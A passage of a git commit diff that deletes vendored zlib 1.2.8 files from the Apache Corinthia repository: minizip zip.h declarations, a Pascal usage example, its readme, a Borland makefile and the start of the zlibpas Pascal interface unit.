globalcomment, - zlib_filefunc_def* pzlib_filefunc_def)); - -extern zipFile ZEXPORT zipOpen2_64 OF((const void *pathname, - int append, - zipcharpc* globalcomment, - zlib_filefunc64_def* pzlib_filefunc_def)); - -extern int ZEXPORT zipOpenNewFileInZip OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level)); - -extern int ZEXPORT zipOpenNewFileInZip64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int zip64)); - -/* - Open a file in the ZIP for writing. - filename : the filename in zip (if NULL, '-' without quote will be used - *zipfi contain supplemental information - if extrafield_local!=NULL and size_extrafield_local>0, extrafield_local - contains the extrafield data the the local header - if extrafield_global!=NULL and size_extrafield_global>0, extrafield_global - contains the extrafield data the the local header - if comment != NULL, comment contain the comment string - method contain the compression method (0 for store, Z_DEFLATED for deflate) - level contain the level of compression (can be Z_DEFAULT_COMPRESSION) - zip64 is set to 1 if a zip64 extended information block should be added to the local file header. - this MUST be '1' if the uncompressed size is >= 0xffffffff. - -*/ - - -extern int ZEXPORT zipOpenNewFileInZip2 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw)); - - -extern int ZEXPORT zipOpenNewFileInZip2_64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int zip64)); -/* - Same than zipOpenNewFileInZip, except if raw=1, we write raw file - */ - -extern int ZEXPORT zipOpenNewFileInZip3 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting)); - -extern int ZEXPORT zipOpenNewFileInZip3_64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting, - int zip64 - )); - -/* - Same than zipOpenNewFileInZip2, except - windowBits,memLevel,,strategy : see parameter strategy in deflateInit2 - password : crypting password (NULL for no crypting) - crcForCrypting : crc of file to compress (needed for crypting) - */ - -extern int ZEXPORT zipOpenNewFileInZip4 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting, - uLong versionMadeBy, - uLong flagBase - )); - - -extern int ZEXPORT zipOpenNewFileInZip4_64 OF((zipFile file, - const char* filename, - const zip_fileinfo* zipfi, - const void* extrafield_local, - uInt size_extrafield_local, - const void* extrafield_global, - uInt size_extrafield_global, - const char* comment, - int method, - int level, - int raw, - int windowBits, - int memLevel, - int strategy, - const char* password, - uLong crcForCrypting, - uLong versionMadeBy, - uLong flagBase, - int zip64 - )); -/* - Same than zipOpenNewFileInZip4, except - versionMadeBy : value for Version made by field - flag : value for flag field (compression level info will be added) - */ - - -extern int ZEXPORT zipWriteInFileInZip OF((zipFile file, - const void* buf, - unsigned len)); -/* - Write data in the zipfile -*/ - -extern int ZEXPORT zipCloseFileInZip OF((zipFile file)); -/* - Close the current file in the zipfile -*/ - -extern int ZEXPORT zipCloseFileInZipRaw OF((zipFile file, - uLong uncompressed_size, - uLong crc32)); - -extern int ZEXPORT zipCloseFileInZipRaw64 OF((zipFile file, - ZPOS64_T uncompressed_size, - uLong crc32)); - -/* - Close the current file in the zipfile, for file opened with - parameter raw=1 in zipOpenNewFileInZip2 - uncompressed_size and crc32 are value for the uncompressed size -*/ - -extern int ZEXPORT zipClose OF((zipFile file, - const char* global_comment)); -/* - Close the zipfile -*/ - - -extern int ZEXPORT zipRemoveExtraInfoBlock OF((char* pData, int* dataLen, short sHeader)); -/* - zipRemoveExtraInfoBlock - Added by Mathias Svensson - - Remove extra information block from a extra information data for the local file header or central directory header - - It is needed to remove ZIP64 extra information blocks when before data is written if using RAW mode. - - 0x0001 is the signature header for the ZIP64 extra information blocks - - usage. - Remove ZIP64 Extra information from a central director extra field data - zipRemoveExtraInfoBlock(pCenDirExtraFieldData, &nCenDirExtraFieldDataLen, 0x0001); - - Remove ZIP64 Extra information from a Local File Header extra field data - zipRemoveExtraInfoBlock(pLocalHeaderExtraFieldData, &nLocalHeaderExtraFieldDataLen, 0x0001); -*/ - -#ifdef __cplusplus -} -#endif - -#endif /* _zip64_H */ http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas deleted file mode 100644 index 5518b36..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/example.pas +++ /dev/null @@ -1,599 +0,0 @@ -(* example.c -- usage example of the zlib compression library - * Copyright (C) 1995-2003 Jean-loup Gailly. - * For conditions of distribution and use, see copyright notice in zlib.h - * - * Pascal translation - * Copyright (C) 1998 by Jacques Nomssi Nzali. - * For conditions of distribution and use, see copyright notice in readme.txt - * - * Adaptation to the zlibpas interface - * Copyright (C) 2003 by Cosmin Truta. - * For conditions of distribution and use, see copyright notice in readme.txt - *) - -program example; - -{$DEFINE TEST_COMPRESS} -{DO NOT $DEFINE TEST_GZIO} -{$DEFINE TEST_DEFLATE} -{$DEFINE TEST_INFLATE} -{$DEFINE TEST_FLUSH} -{$DEFINE TEST_SYNC} -{$DEFINE TEST_DICT} - -uses SysUtils, zlibpas; - -const TESTFILE = 'foo.gz'; - -(* "hello world" would be more standard, but the repeated "hello" - * stresses the compression code better, sorry... - *) -const hello: PChar = 'hello, hello!'; - -const dictionary: PChar = 'hello'; - -var dictId: LongInt; (* Adler32 value of the dictionary *) - -procedure CHECK_ERR(err: Integer; msg: String); -begin - if err <> Z_OK then - begin - WriteLn(msg, ' error: ', err); - Halt(1); - end; -end; - -procedure EXIT_ERR(const msg: String); -begin - WriteLn('Error: ', msg); - Halt(1); -end; - -(* =========================================================================== - * Test compress and uncompress - *) -{$IFDEF TEST_COMPRESS} -procedure test_compress(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var err: Integer; - len: LongInt; -begin - len := StrLen(hello)+1; - - err := compress(compr, comprLen, hello, len); - CHECK_ERR(err, 'compress'); - - StrCopy(PChar(uncompr), 'garbage'); - - err := uncompress(uncompr, uncomprLen, compr, comprLen); - CHECK_ERR(err, 'uncompress'); - - if StrComp(PChar(uncompr), hello) <> 0 then - EXIT_ERR('bad uncompress') - else - WriteLn('uncompress(): ', PChar(uncompr)); -end; -{$ENDIF} - -(* =========================================================================== - * Test read/write of .gz files - *) -{$IFDEF TEST_GZIO} -procedure test_gzio(const fname: PChar; (* compressed file name *) - uncompr: Pointer; - uncomprLen: LongInt); -var err: Integer; - len: Integer; - zfile: gzFile; - pos: LongInt; -begin - len := StrLen(hello)+1; - - zfile := gzopen(fname, 'wb'); - if zfile = NIL then - begin - WriteLn('gzopen error'); - Halt(1); - end; - gzputc(zfile, 'h'); - if gzputs(zfile, 'ello') <> 4 then - begin - WriteLn('gzputs err: ', gzerror(zfile, err)); - Halt(1); - end; - {$IFDEF GZ_FORMAT_STRING} - if gzprintf(zfile, ', %s!', 'hello') <> 8 then - begin - WriteLn('gzprintf err: ', gzerror(zfile, err)); - Halt(1); - end; - {$ELSE} - if gzputs(zfile, ', hello!') <> 8 then - begin - WriteLn('gzputs err: ', gzerror(zfile, err)); - Halt(1); - end; - {$ENDIF} - gzseek(zfile, 1, SEEK_CUR); (* add one zero byte *) - gzclose(zfile); - - zfile := gzopen(fname, 'rb'); - if zfile = NIL then - begin - WriteLn('gzopen error'); - Halt(1); - end; - - StrCopy(PChar(uncompr), 'garbage'); - - if gzread(zfile, uncompr, uncomprLen) <> len then - begin - WriteLn('gzread err: ', gzerror(zfile, err)); - Halt(1); - end; - if StrComp(PChar(uncompr), hello) <> 0 then - begin - WriteLn('bad gzread: ', PChar(uncompr)); - Halt(1); - end - else - WriteLn('gzread(): ', PChar(uncompr)); - - pos := gzseek(zfile, -8, SEEK_CUR); - if (pos <> 6) or (gztell(zfile) <> pos) then - begin - WriteLn('gzseek error, pos=', pos, ', gztell=', gztell(zfile)); - Halt(1); - end; - - if gzgetc(zfile) <> ' ' then - begin - WriteLn('gzgetc error'); - Halt(1); - end; - - if gzungetc(' ', zfile) <> ' ' then - begin - WriteLn('gzungetc error'); - Halt(1); - end; - - gzgets(zfile, PChar(uncompr), uncomprLen); - uncomprLen := StrLen(PChar(uncompr)); - if uncomprLen <> 7 then (* " hello!" *) - begin - WriteLn('gzgets err after gzseek: ', gzerror(zfile, err)); - Halt(1); - end; - if StrComp(PChar(uncompr), hello + 6) <> 0 then - begin - WriteLn('bad gzgets after gzseek'); - Halt(1); - end - else - WriteLn('gzgets() after gzseek: ', PChar(uncompr)); - - gzclose(zfile); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with small buffers - *) -{$IFDEF TEST_DEFLATE} -procedure test_deflate(compr: Pointer; comprLen: LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; - len: LongInt; -begin - len := StrLen(hello)+1; - - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_DEFAULT_COMPRESSION); - CHECK_ERR(err, 'deflateInit'); - - c_stream.next_in := hello; - c_stream.next_out := compr; - - while (c_stream.total_in <> len) and - (c_stream.total_out < comprLen) do - begin - c_stream.avail_out := 1; { force small buffers } - c_stream.avail_in := 1; - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - end; - - (* Finish the stream, still forcing small buffers: *) - while TRUE do - begin - c_stream.avail_out := 1; - err := deflate(c_stream, Z_FINISH); - if err = Z_STREAM_END then - break; - CHECK_ERR(err, 'deflate'); - end; - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); -end; -{$ENDIF} - -(* =========================================================================== - * Test inflate with small buffers - *) -{$IFDEF TEST_INFLATE} -procedure test_inflate(compr: Pointer; comprLen : LongInt; - uncompr: Pointer; uncomprLen : LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := 0; - d_stream.next_out := uncompr; - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - while (d_stream.total_out < uncomprLen) and - (d_stream.total_in < comprLen) do - begin - d_stream.avail_out := 1; (* force small buffers *) - d_stream.avail_in := 1; - err := inflate(d_stream, Z_NO_FLUSH); - if err = Z_STREAM_END then - break; - CHECK_ERR(err, 'inflate'); - end; - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - if StrComp(PChar(uncompr), hello) <> 0 then - EXIT_ERR('bad inflate') - else - WriteLn('inflate(): ', PChar(uncompr)); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with large buffers and dynamic change of compression level - *) -{$IFDEF TEST_DEFLATE} -procedure test_large_deflate(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; -begin - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_BEST_SPEED); - CHECK_ERR(err, 'deflateInit'); - - c_stream.next_out := compr; - c_stream.avail_out := Integer(comprLen); - - (* At this point, uncompr is still mostly zeroes, so it should compress - * very well: - *) - c_stream.next_in := uncompr; - c_stream.avail_in := Integer(uncomprLen); - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - if c_stream.avail_in <> 0 then - EXIT_ERR('deflate not greedy'); - - (* Feed in already compressed data and switch to no compression: *) - deflateParams(c_stream, Z_NO_COMPRESSION, Z_DEFAULT_STRATEGY); - c_stream.next_in := compr; - c_stream.avail_in := Integer(comprLen div 2); - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - - (* Switch back to compressing mode: *) - deflateParams(c_stream, Z_BEST_COMPRESSION, Z_FILTERED); - c_stream.next_in := uncompr; - c_stream.avail_in := Integer(uncomprLen); - err := deflate(c_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'deflate'); - - err := deflate(c_stream, Z_FINISH); - if err <> Z_STREAM_END then - EXIT_ERR('deflate should report Z_STREAM_END'); - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); -end; -{$ENDIF} - -(* =========================================================================== - * Test inflate with large buffers - *) -{$IFDEF TEST_INFLATE} -procedure test_large_inflate(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := Integer(comprLen); - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - while TRUE do - begin - d_stream.next_out := uncompr; (* discard the output *) - d_stream.avail_out := Integer(uncomprLen); - err := inflate(d_stream, Z_NO_FLUSH); - if err = Z_STREAM_END then - break; - CHECK_ERR(err, 'large inflate'); - end; - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - if d_stream.total_out <> 2 * uncomprLen + comprLen div 2 then - begin - WriteLn('bad large inflate: ', d_stream.total_out); - Halt(1); - end - else - WriteLn('large_inflate(): OK'); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with full flush - *) -{$IFDEF TEST_FLUSH} -procedure test_flush(compr: Pointer; var comprLen : LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; - len: Integer; -begin - len := StrLen(hello)+1; - - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_DEFAULT_COMPRESSION); - CHECK_ERR(err, 'deflateInit'); - - c_stream.next_in := hello; - c_stream.next_out := compr; - c_stream.avail_in := 3; - c_stream.avail_out := Integer(comprLen); - err := deflate(c_stream, Z_FULL_FLUSH); - CHECK_ERR(err, 'deflate'); - - Inc(PByteArray(compr)^[3]); (* force an error in first compressed block *) - c_stream.avail_in := len - 3; - - err := deflate(c_stream, Z_FINISH); - if err <> Z_STREAM_END then - CHECK_ERR(err, 'deflate'); - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); - - comprLen := c_stream.total_out; -end; -{$ENDIF} - -(* =========================================================================== - * Test inflateSync() - *) -{$IFDEF TEST_SYNC} -procedure test_sync(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen : LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := 2; (* just read the zlib header *) - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - d_stream.next_out := uncompr; - d_stream.avail_out := Integer(uncomprLen); - - inflate(d_stream, Z_NO_FLUSH); - CHECK_ERR(err, 'inflate'); - - d_stream.avail_in := Integer(comprLen-2); (* read all compressed data *) - err := inflateSync(d_stream); (* but skip the damaged part *) - CHECK_ERR(err, 'inflateSync'); - - err := inflate(d_stream, Z_FINISH); - if err <> Z_DATA_ERROR then - EXIT_ERR('inflate should report DATA_ERROR'); - (* Because of incorrect adler32 *) - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - WriteLn('after inflateSync(): hel', PChar(uncompr)); -end; -{$ENDIF} - -(* =========================================================================== - * Test deflate with preset dictionary - *) -{$IFDEF TEST_DICT} -procedure test_dict_deflate(compr: Pointer; comprLen: LongInt); -var c_stream: z_stream; (* compression stream *) - err: Integer; -begin - c_stream.zalloc := NIL; - c_stream.zfree := NIL; - c_stream.opaque := NIL; - - err := deflateInit(c_stream, Z_BEST_COMPRESSION); - CHECK_ERR(err, 'deflateInit'); - - err := deflateSetDictionary(c_stream, dictionary, StrLen(dictionary)); - CHECK_ERR(err, 'deflateSetDictionary'); - - dictId := c_stream.adler; - c_stream.next_out := compr; - c_stream.avail_out := Integer(comprLen); - - c_stream.next_in := hello; - c_stream.avail_in := StrLen(hello)+1; - - err := deflate(c_stream, Z_FINISH); - if err <> Z_STREAM_END then - EXIT_ERR('deflate should report Z_STREAM_END'); - - err := deflateEnd(c_stream); - CHECK_ERR(err, 'deflateEnd'); -end; -{$ENDIF} - -(* =========================================================================== - * Test inflate with a preset dictionary - *) -{$IFDEF TEST_DICT} -procedure test_dict_inflate(compr: Pointer; comprLen: LongInt; - uncompr: Pointer; uncomprLen: LongInt); -var err: Integer; - d_stream: z_stream; (* decompression stream *) -begin - StrCopy(PChar(uncompr), 'garbage'); - - d_stream.zalloc := NIL; - d_stream.zfree := NIL; - d_stream.opaque := NIL; - - d_stream.next_in := compr; - d_stream.avail_in := Integer(comprLen); - - err := inflateInit(d_stream); - CHECK_ERR(err, 'inflateInit'); - - d_stream.next_out := uncompr; - d_stream.avail_out := Integer(uncomprLen); - - while TRUE do - begin - err := inflate(d_stream, Z_NO_FLUSH); - if err = Z_STREAM_END then - break; - if err = Z_NEED_DICT then - begin - if d_stream.adler <> dictId then - EXIT_ERR('unexpected dictionary'); - err := inflateSetDictionary(d_stream, dictionary, StrLen(dictionary)); - end; - CHECK_ERR(err, 'inflate with dict'); - end; - - err := inflateEnd(d_stream); - CHECK_ERR(err, 'inflateEnd'); - - if StrComp(PChar(uncompr), hello) <> 0 then - EXIT_ERR('bad inflate with dict') - else - WriteLn('inflate with dictionary: ', PChar(uncompr)); -end; -{$ENDIF} - -var compr, uncompr: Pointer; - comprLen, uncomprLen: LongInt; - -begin - if zlibVersion^ <> ZLIB_VERSION[1] then - EXIT_ERR('Incompatible zlib version'); - - WriteLn('zlib version: ', zlibVersion); - WriteLn('zlib compile flags: ', Format('0x%x', [zlibCompileFlags])); - - comprLen := 10000 * SizeOf(Integer); (* don't overflow on MSDOS *) - uncomprLen := comprLen; - GetMem(compr, comprLen); - GetMem(uncompr, uncomprLen); - if (compr = NIL) or (uncompr = NIL) then - EXIT_ERR('Out of memory'); - (* compr and uncompr are cleared to avoid reading uninitialized - * data and to ensure that uncompr compresses well. - *) - FillChar(compr^, comprLen, 0); - FillChar(uncompr^, uncomprLen, 0); - - {$IFDEF TEST_COMPRESS} - WriteLn('** Testing compress'); - test_compress(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_GZIO} - WriteLn('** Testing gzio'); - if ParamCount >= 1 then - test_gzio(ParamStr(1), uncompr, uncomprLen) - else - test_gzio(TESTFILE, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_DEFLATE} - WriteLn('** Testing deflate with small buffers'); - test_deflate(compr, comprLen); - {$ENDIF} - {$IFDEF TEST_INFLATE} - WriteLn('** Testing inflate with small buffers'); - test_inflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_DEFLATE} - WriteLn('** Testing deflate with large buffers'); - test_large_deflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - {$IFDEF TEST_INFLATE} - WriteLn('** Testing inflate with large buffers'); - test_large_inflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - {$IFDEF TEST_FLUSH} - WriteLn('** Testing deflate with full flush'); - test_flush(compr, comprLen); - {$ENDIF} - {$IFDEF TEST_SYNC} - WriteLn('** Testing inflateSync'); - test_sync(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - comprLen := uncomprLen; - - {$IFDEF TEST_DICT} - WriteLn('** Testing deflate and inflate with preset dictionary'); - test_dict_deflate(compr, comprLen); - test_dict_inflate(compr, comprLen, uncompr, uncomprLen); - {$ENDIF} - - FreeMem(compr, comprLen); - FreeMem(uncompr, uncomprLen); -end. http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt deleted file mode 100644 index 60e87c8..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/readme.txt +++ /dev/null @@ -1,76 +0,0 @@ - -This directory contains a Pascal (Delphi, Kylix) interface to the -zlib data compression library. - - -Directory listing -================= - -zlibd32.mak makefile for Borland C++ -example.pas usage example of zlib -zlibpas.pas the Pascal interface to zlib -readme.txt this file - - -Compatibility notes -=================== - -- Although the name "zlib" would have been more normal for the - zlibpas unit, this name is already taken by Borland's ZLib unit. - This is somehow unfortunate, because that unit is not a genuine - interface to the full-fledged zlib functionality, but a suite of - class wrappers around zlib streams. Other essential features, - such as checksums, are missing. - It would have been more appropriate for that unit to have a name - like "ZStreams", or something similar. - -- The C and zlib-supplied types int, uInt, long, uLong, etc. are - translated directly into Pascal types of similar sizes (Integer, - LongInt, etc.), to avoid namespace pollution. In particular, - there is no conversion of unsigned int into a Pascal unsigned - integer. The Word type is non-portable and has the same size - (16 bits) both in a 16-bit and in a 32-bit environment, unlike - Integer. Even if there is a 32-bit Cardinal type, there is no - real need for unsigned int in zlib under a 32-bit environment. - -- Except for the callbacks, the zlib function interfaces are - assuming the calling convention normally used in Pascal - (__pascal for DOS and Windows16, __fastcall for Windows32). - Since the cdecl keyword is used, the old Turbo Pascal does - not work with this interface. - -- The gz* function interfaces are not translated, to avoid - interfacing problems with the C runtime library. Besides, - gzprintf(gzFile file, const char *format, ...) - cannot be translated into Pascal. - - -Legal issues -============ - -The zlibpas interface is: - Copyright (C) 1995-2003 Jean-loup Gailly and Mark Adler. - Copyright (C) 1998 by Bob Dellaca. - Copyright (C) 2003 by Cosmin Truta. - -The example program is: - Copyright (C) 1995-2003 by Jean-loup Gailly. - Copyright (C) 1998,1999,2000 by Jacques Nomssi Nzali. - Copyright (C) 2003 by Cosmin Truta. - - This software is provided 'as-is', without any express or implied - warranty. In no event will the author be held liable for any damages - arising from the use of this software. - - Permission is granted to anyone to use this software for any purpose, - including commercial applications, and to alter it and redistribute it - freely, subject to the following restrictions: - - 1. The origin of this software must not be misrepresented; you must not - claim that you wrote the original software. If you use this software - in a product, an acknowledgment in the product documentation would be - appreciated but is not required. - 2. Altered source versions must be plainly marked as such, and must not be - misrepresented as being the original software. - 3. This notice may not be removed or altered from any source distribution. - http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak deleted file mode 100644 index 9bb00b7..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibd32.mak +++ /dev/null @@ -1,99 +0,0 @@ -# Makefile for zlib -# For use with Delphi and C++ Builder under Win32 -# Updated for zlib 1.2.x by Cosmin Truta - -# ------------ Borland C++ ------------ - -# This project uses the Delphi (fastcall/register) calling convention: -LOC = -DZEXPORT=__fastcall -DZEXPORTVA=__cdecl - -CC = bcc32 -LD = bcc32 -AR = tlib -# do not use "-pr" in CFLAGS -CFLAGS = -a -d -k- -O2 $(LOC) -LDFLAGS = - - -# variables -ZLIB_LIB = zlib.lib - -OBJ1 = adler32.obj compress.obj crc32.obj deflate.obj gzclose.obj gzlib.obj gzread.obj -OBJ2 = gzwrite.obj infback.obj inffast.obj inflate.obj inftrees.obj trees.obj uncompr.obj zutil.obj -OBJP1 = +adler32.obj+compress.obj+crc32.obj+deflate.obj+gzclose.obj+gzlib.obj+gzread.obj -OBJP2 = +gzwrite.obj+infback.obj+inffast.obj+inflate.obj+inftrees.obj+trees.obj+uncompr.obj+zutil.obj - - -# targets -all: $(ZLIB_LIB) example.exe minigzip.exe - -.c.obj: - $(CC) -c $(CFLAGS) $*.c - -adler32.obj: adler32.c zlib.h zconf.h - -compress.obj: compress.c zlib.h zconf.h - -crc32.obj: crc32.c zlib.h zconf.h crc32.h - -deflate.obj: deflate.c deflate.h zutil.h zlib.h zconf.h - -gzclose.obj: gzclose.c zlib.h zconf.h gzguts.h - -gzlib.obj: gzlib.c zlib.h zconf.h gzguts.h - -gzread.obj: gzread.c zlib.h zconf.h gzguts.h - -gzwrite.obj: gzwrite.c zlib.h zconf.h gzguts.h - -infback.obj: infback.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ - inffast.h inffixed.h - -inffast.obj: inffast.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ - inffast.h - -inflate.obj: inflate.c zutil.h zlib.h zconf.h inftrees.h inflate.h \ - inffast.h inffixed.h - -inftrees.obj: inftrees.c zutil.h zlib.h zconf.h inftrees.h - -trees.obj: trees.c zutil.h zlib.h zconf.h deflate.h trees.h - -uncompr.obj: uncompr.c zlib.h zconf.h - -zutil.obj: zutil.c zutil.h zlib.h zconf.h - -example.obj: test/example.c zlib.h zconf.h - -minigzip.obj: test/minigzip.c zlib.h zconf.h - - -# For the sake of the old Borland make, -# the command line is cut to fit in the MS-DOS 128 byte limit: -$(ZLIB_LIB): $(OBJ1) $(OBJ2) - -del $(ZLIB_LIB) - $(AR) $(ZLIB_LIB) $(OBJP1) - $(AR) $(ZLIB_LIB) $(OBJP2) - - -# testing -test: example.exe minigzip.exe - example - echo hello world | minigzip | minigzip -d - -example.exe: example.obj $(ZLIB_LIB) - $(LD) $(LDFLAGS) example.obj $(ZLIB_LIB) - -minigzip.exe: minigzip.obj $(ZLIB_LIB) - $(LD) $(LDFLAGS) minigzip.obj $(ZLIB_LIB) - - -# cleanup -clean: - -del *.obj - -del *.exe - -del *.lib - -del *.tds - -del zlib.bak - -del foo.gz - http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas deleted file mode 100644 index e6a0782..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/pascal/zlibpas.pas +++ /dev/null @@ -1,276 +0,0 @@ -(* zlibpas -- Pascal interface to the zlib data compression library - * - * Copyright (C) 2003 Cosmin Truta. - * Derived from original sources by Bob Dellaca. - * For conditions of distribution and use, see copyright notice in readme.txt - *) - -unit zlibpas; - -interface - -const - ZLIB_VERSION = '1.2.8'; - ZLIB_VERNUM = $1280; - -type - alloc_func = function(opaque: Pointer; items, size: Integer): Pointer; - cdecl; - free_func = procedure(opaque, address: Pointer); - cdecl; - - in_func = function(opaque: Pointer; var buf: PByte): Integer; - cdecl; - out_func = function(opaque: Pointer; buf: PByte; size: Integer): Integer; - cdecl; - - z_streamp = ^z_stream; - z_stream = packed record - next_in: PChar; (* next input byte *) - avail_in: Integer; (* number of bytes available at next_in *) - total_in: LongInt; (* total nb of input bytes read so far *) - - next_out: PChar; (* next output byte should be put there *) - avail_out: Integer; (* remaining free space at next_out *) - total_out: LongInt; (* total nb of bytes output so far *) - - msg: PChar; (* last error message, NULL if no error *) - state: Pointer; (* not visible by applications *) - - zalloc: alloc_func; (* used to allocate the internal state *) - zfree: free_func; (* used to free the internal state *) - opaque: Pointer; (* private data object passed to zalloc and zfree *) - - data_type: Integer; (* best guess about the data type: ascii or binary *) - adler: LongInt; (* adler32 value of the uncompressed data *) - reserved: LongInt; (* reserved for future use *) - end; - - gz_headerp = ^gz_header; - gz_header = packed record - text: Integer; (* true if compressed data believed to be text *) - time: LongInt; (* modification time *) - xflags: Integer; (* extra flags (not used when writing a gzip file) *) - os: Integer; (* operating system *) - extra: PChar; (* pointer to extra field or Z_NULL if none *) - extra_len: Integer; (* extra field length (valid if extra != Z_NULL) *) - extra_max: Integer; (* space at extra (only when reading header) *) - name: PChar; (* pointer to zero-terminated file name or Z_NULL *) - name_max: Integer; (* space at name (only when reading header) *) - comment: PChar; (* pointer to zero-terminated comment or Z_NULL *) - comm_max: Integer; (* space at comment (only when reading header) *) - hcrc: Integer; (* true if there was or will be a header crc *) - done: Integer; (* true when done reading gzip header *) - end; - -(* constants *) -const - Z_NO_FLUSH = 0; - Z_PARTIAL_FLUSH = 1; - Z_SYNC_FLUSH = 2; - Z_FULL_FLUSH = 3; - Z_FINISH = 4; - Z_BLOCK = 5; - Z_TREES = 6; - - Z_OK = 0; - Z_STREAM_END = 1; - Z_NEED_DICT = 2; - Z_ERRNO = 